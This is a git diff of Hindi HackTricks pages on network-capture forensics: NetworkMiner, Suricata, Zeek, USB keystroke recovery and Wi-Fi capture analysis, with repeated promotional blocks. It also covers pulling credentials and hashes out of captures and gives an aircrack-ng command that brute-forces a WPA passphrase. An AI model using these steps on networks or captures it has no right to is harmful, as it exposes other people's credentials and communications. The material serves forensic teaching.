Xplico की तरह यह एक उपकरण है जो **pcaps से वस्तुओं का विश्लेषण और निकालना** करने के लिए है। इसका एक मुफ्त संस्करण है जिसे आप [**यहाँ**](https://www.netresec.com/?page=NetworkMiner) से **डाउनलोड** कर सकते हैं। यह **Windows** के साथ काम करता है।\
|
||||
यह उपकरण भी **पैकेट्स से अन्य जानकारी प्राप्त** करने के लिए उपयोगी है ताकि एक **तेज़ तरीके से** क्या हो रहा था उसे पता चल सके।
|
||||
Xplico की तरह यह एक उपकरण है **pcaps से वस्तुओं का विश्लेषण और निकालने** के लिए। इसका एक मुफ्त संस्करण है जिसे आप [**यहाँ**](https://www.netresec.com/?page=NetworkMiner) से **डाउनलोड** कर सकते हैं। यह **Windows** के साथ काम करता है।\
|
||||
यह उपकरण भी **पैकेट्स से अन्य जानकारी** प्राप्त करने के लिए उपयोगी है ताकि आप एक **तेज़ तरीके से** क्या हो रहा था उसे जान सकें।
|
||||
|
||||
### NetWitness Investigator
|
||||
|
||||
आप [**यहाँ से NetWitness Investigator डाउनलोड कर सकते हैं**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(यह Windows में काम करता है)**।\
|
||||
यह एक और उपयोगी उपकरण है जो **पैकेट्स का विश्लेषण** करता है और जानकारी को एक उपयोगी तरीके से **व्यवस्थित करता है** ताकि **अंदर क्या हो रहा है** उसे पता चल सके।
|
||||
यह एक और उपयोगी उपकरण है जो **पैकेट्स का विश्लेषण** करता है और जानकारी को एक उपयोगी तरीके से **व्यवस्थित करता है** ताकि आप यह जान सकें कि अंदर क्या हो रहा है।
|
||||
|
||||
### [BruteShark](https://github.com/odedshimon/BruteShark)
|
||||
|
||||
* उपयोगकर्ता नाम और पासवर्ड (HTTP, FTP, Telnet, IMAP, SMTP...) को निकालना और एन्कोड करना
|
||||
* उपयोगकर्ता नाम और पासवर्ड को निकालना और एन्कोड करना (HTTP, FTP, Telnet, IMAP, SMTP...)
|
||||
* प्रमाणीकरण हैश निकालना और Hashcat का उपयोग करके उन्हें क्रैक करना (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...)
|
||||
* एक दृश्यात्मक नेटवर्क आरेखित करना (नेटवर्क नोड्स और उपयोगकर्ता)
|
||||
* DNS पूछताछ निकालना
|
||||
* सभी TCP और UDP सत्रों का पुनर्निर्माण करना
|
||||
* एक विजुअल नेटवर्क आरेखित करना (नेटवर्क नोड्स और उपयोगकर्ता)
|
||||
* DNS क्वेरी निकालना
|
||||
* सभी TCP और UDP सत्र पुनर्निर्माण करना
|
||||
* फ़ाइल कार्विंग
|
||||
|
||||
### Capinfos
|
||||
|
@ -91,7 +92,7 @@ capinfos capture.pcap
|
|||
```
|
||||
### Ngrep
|
||||
|
||||
यदि आप pcap के अंदर कुछ ढूंढ़ रहे हैं तो आप **ngrep** का उपयोग कर सकते हैं। यहाँ मुख्य फ़िल्टर्स का उपयोग करके एक उदाहरण है:
|
||||
यदि आप pcap के अंदर कुछ **खोज** रहे हैं तो आप **ngrep** का उपयोग कर सकते हैं। यहाँ मुख्य फ़िल्टर्स का उपयोग करके एक उदाहरण है:
|
||||
```bash
|
||||
ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168"
|
||||
```
|
||||
|
@ -103,7 +104,7 @@ ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.
|
|||
[file-data-carving-recovery-tools.md](../partitions-file-systems-carving/file-data-carving-recovery-tools.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### क्रेडेंशियल कैप्चर
|
||||
### क्रेडेंशियल कैप्चरिंग
|
||||
|
||||
आप [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) जैसे उपकरणों का उपयोग कर सकते हैं ताकि आप pcap या लाइव इंटरफेस से क्रेडेंशियल को पार्स कर सकें।
|
||||
|
||||
|
@ -113,18 +114,18 @@ ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.
|
|||
|
||||
{% embed url="https://www.rootedcon.com/" %}
|
||||
|
||||
## जांच करें Exploits/Malware
|
||||
## जांच एक्सप्लॉइट्स/मैलवेयर
|
||||
|
||||
### Suricata
|
||||
|
||||
**स्थापित और सेटअप**
|
||||
**स्थापित करें और सेटअप**
|
||||
```
|
||||
apt-get install suricata
|
||||
apt-get install oinkmaster
|
||||
echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf
|
||||
oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules
|
||||
```
|
||||
**पीकैप जांचें**
|
||||
**पीकैप जाँचें**
|
||||
```
|
||||
suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
|
||||
```
|
||||
|
@ -132,8 +133,8 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
|
|||
|
||||
[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) एक टूल है जो
|
||||
|
||||
* एक PCAP फ़ाइल पढ़ता है और Http स्ट्रीम्स निकालता है।
|
||||
* किसी भी संपीडित स्ट्रीम को gzip डिफ़्लेट करता है
|
||||
* एक PCAP फ़ाइल पढ़ता है और Http स्ट्रीम निकालता है।
|
||||
* किसी भी संपीड़ित स्ट्रीम को gzip डिफ़्लेट करता है
|
||||
* हर फ़ाइल को यारा के साथ स्कैन करता है
|
||||
* रिपोर्ट.txt लिखता है
|
||||
* वैकल्पिक रूप से मिलने वाली फ़ाइलों को एक डिर में सहेजता है
|
||||
|
@ -148,9 +149,9 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
|
|||
|
||||
## Zeek
|
||||
|
||||
> [Zeek](https://docs.zeek.org/en/master/about.html) एक पैसिव, ओपन-सोर्स नेटवर्क ट्रैफ़िक विश्लेषक है। कई ऑपरेटर्स संदेहात्मक या दुराचार गतिविधि की जांच का समर्थन करने के लिए Zeek का उपयोग नेटवर्क सुरक्षा मॉनिटर (NSM) के रूप में करते हैं। Zeek इसके अलावा सुरक्षा डोमेन के पार एक व्यापक ट्रैफ़िक विश्लेषण कार्यों का समर्थन भी करता है, जिसमें प्रदर्शन मापन और समस्या सुलझाने जैसे कार्य शामिल हैं।
|
||||
> [Zeek](https://docs.zeek.org/en/master/about.html) एक पैसिव, ओपन-सोर्स नेटवर्क ट्रैफ़िक विश्लेषक है। कई ऑपरेटर संदेहपूर्ण या दुष्ट गतिविधि की जांच का समर्थन करने के लिए Zeek का उपयोग नेटवर्क सुरक्षा मॉनिटर (NSM) के रूप में करते हैं। Zeek नेटवर्क सुरक्षा डोमेन के अलावा एक व्यापक ट्रैफ़िक विश्लेषण कार्यों का समर्थन भी करता है, जिसमें प्रदर्शन मापन और ट्रबलशूटिंग शामिल है।
|
||||
|
||||
मूल रूप से, `zeek` द्वारा बनाए गए लॉग **पीकैप्स** नहीं हैं। इसलिए आपको लॉग का विश्लेषण करने के लिए **अन्य उपकरण** का उपयोग करना होगा जहां **जानकारी** पीकैप्स के बारे में होती है।
|
||||
मूल रूप से, `zeek` द्वारा बनाए गए लॉग **पीकैप्स** नहीं हैं। इसलिए आपको लॉग विश्लेषित करने के लिए **अन्य उपकरण** का उपयोग करना होगा जहां **पीकैप्स** के बारे में **जानकारी** हो।
|
||||
|
||||
### कनेक्शन जानकारी
|
||||
```bash
|
||||
|
@ -237,20 +238,21 @@ rita show-exploded-dns -H --limit 10 zeek_logs
|
|||
|
||||
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उबाऊ मिलन स्थल है।
|
||||
[**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उफान मिलने का समारोह है।
|
||||
|
||||
{% embed url="https://www.rootedcon.com/" %}
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **जुड़ें** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) से या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 पर हमें **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,27 +1,43 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** (https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
यदि आपके पास एक USB कनेक्शन का pcap है जिसमें कई बार अवरुद्धियाँ हैं तो शायद यह एक USB कीबोर्ड कनेक्शन हो।
|
||||
यदि आपके पास एक USB कनेक्शन का pcap है जिसमें कई बार अंतर्रुप्तियाँ हैं तो शायद यह एक USB कीबोर्ड कनेक्शन हो।
|
||||
|
||||
एक वायरशार्क फ़िल्टर जैसे यह उपयोगी हो सकता है: `usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)`
|
||||
|
||||
यह महत्वपूर्ण हो सकता है कि "02" से शुरू होने वाला डेटा शिफ्ट का उपयोग करके दबाया गया है।
|
||||
|
||||
आप इसे विश्लेषित करने के लिए और अधिक जानकारी पढ़ सकते हैं और कुछ स्क्रिप्ट्स भी पा सकते हैं:
|
||||
आप इसे विश्लेषित करने के लिए अधिक जानकारी पढ़ सकते हैं और कुछ स्क्रिप्ट्स भी पा सकते हैं:
|
||||
|
||||
* [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4)
|
||||
* [https://github.com/tanc7/HacktheBox\_Deadly\_Arthropod\_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup)
|
||||
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,19 +1,20 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github repos में PRs सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
यदि आपके पास एक pcap है जिसमें एक कीबोर्ड के माध्यम से USB के माध्यम से संचार है जैसे निम्नलिखित:
|
||||
यदि आपके पास एक pcap है जिसमें एक कीबोर्ड के माध्यम से USB के माध्यम से संचार शामिल है जैसे निम्नलिखित:
|
||||
|
||||
![](<../../../.gitbook/assets/image (613).png>)
|
||||
|
||||
|
@ -22,22 +23,23 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
tshark -r ./usb.pcap -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > keystrokes.txt
|
||||
python3 usbkeyboard.py ./keystrokes.txt
|
||||
```
|
||||
आप इसे विश्लेषित करने के बारे में अधिक जानकारी पढ़ सकते हैं और कुछ स्क्रिप्ट्स यहाँ पा सकते हैं:
|
||||
आप इसे विश्लेषित करने के बारे में अधिक जानकारी पढ़ सकते हैं और कुछ स्क्रिप्ट्स भी यहाँ पा सकते हैं:
|
||||
|
||||
* [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4)
|
||||
* [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
जीसीपी हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>शून्य से हीरो तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github repos में **PRs** सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 पर हमें **फॉलो** करें **@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **हैकिंग ट्रिक्स साझा करें, [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके**।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,49 +1,48 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **Twitter** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
|
||||
* [**सब्सक्रिप्शन योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# BSSIDs की जाँच करें
|
||||
# BSSID जाँचें
|
||||
|
||||
जब आप वायरशार्क का उपयोग करके एक कैप्चर प्राप्त करते हैं जिसका मुख्य ट्रैफिक Wifi है, तो आप _Wireless --> WLAN Traffic_ के साथ कैप्चर के सभी SSID की जाँच शुरू कर सकते हैं:
|
||||
जब आप वायरशार्क का उपयोग करके एक कैप्चर प्राप्त करते हैं जिसका मुख्य ट्रैफिक वाईफ़ाई है, तो आप _Wireless --> WLAN Traffic_ के साथ कैप्चर के सभी एसएसआईडी की जांच शुरू कर सकते हैं:
|
||||
|
||||
![](<../../../.gitbook/assets/image (424).png>)
|
||||
|
||||
![](<../../../.gitbook/assets/image (425).png>)
|
||||
|
||||
## ब्रूट फोर्स
|
||||
## ब्रूट फ़ोर्स
|
||||
|
||||
उस स्क्रीन की एक कॉलम में यह दिखाता है कि **क्या कैप में कोई प्रमाणीकरण मिला है**। यदि ऐसा है तो आप `aircrack-ng` का उपयोग करके इसे Brute force करने की कोशिश कर सकते हैं:
|
||||
उस स्क्रीन के एक कॉलम में एक इंजेक्शन मिला है या नहीं, यह दिखाता है कि **क्या पीकैप में कोई प्रमाणीकरण मिला है**। यदि ऐसा है तो आप `aircrack-ng` का उपयोग करके इसे ब्रूट फ़ोर्स कर सकते हैं:
|
||||
```bash
|
||||
aircrack-ng -w pwds-file.txt -b <BSSID> file.pcap
|
||||
```
|
||||
# उदाहरण के लिए यह PSK (पूर्व साझा कुंजी) को सुरक्षित करने वाले WPA पासफ्रेज़ को पुनः प्राप्त करेगा, जो बाद में ट्रैफिक को डिक्रिप्ट करने के लिए आवश्यक होगा।
|
||||
# डेटा बीकन / साइड चैनल में
|
||||
|
||||
# बीकन्स / साइड चैनल में डेटा
|
||||
यदि आप संदेह कर रहे हैं कि **एक वाईफ़ाई नेटवर्क के बीकन्स में डेटा लीक हो रहा है**, तो आप नेटवर्क के बीकन्स की जांच कर सकते हैं उस नेटवर्क के बीकन्स को चेक करें जैसे निम्नलिखित फ़िल्टर का उपयोग करके: `wlan contains <NAMEofNETWORK>`, या `wlan.ssid == "NAMEofNETWORK"` शंकुलित पैकेट्स के भीतर संदेहास्पद स्ट्रिंग के लिए खोजें।
|
||||
|
||||
यदि आप संदेह कर रहे हैं कि **एक WiFi नेटवर्क के बीकन्स में डेटा लीक हो रहा है** तो आप नेटवर्क के बीकन्स की जांच कर सकते हैं उस फ़िल्टर का उपयोग करके जैसे: `wlan contains <NAMEofNETWORK>`, या `wlan.ssid == "NAMEofNETWORK"` आप संदेशित पैकेट्स के भीतर संदेहास्पद स्ट्रिंग के लिए खोज करें।
|
||||
# एक वाईफ़ाई नेटवर्क में अज्ञात MAC पते खोजें
|
||||
|
||||
# एक WiFi नेटवर्क में अज्ञात MAC पते खोजें
|
||||
|
||||
निम्नलिखित लिंक उपयोगी होगा **एक WiFi नेटवर्क के अंदर डेटा भेजने वाली मशीनों को खोजने के लिए**:
|
||||
निम्नलिखित लिंक उपयोगी होगा **एक वाईफ़ाई नेटवर्क के भीतर डेटा भेजने वाली मशीनें** खोजने के लिए:
|
||||
|
||||
* `((wlan.ta == e8:de:27:16:70:c9) && !(wlan.fc == 0x8000)) && !(wlan.fc.type_subtype == 0x0005) && !(wlan.fc.type_subtype ==0x0004) && !(wlan.addr==ff:ff:ff:ff:ff:ff) && wlan.fc.type==2`
|
||||
|
||||
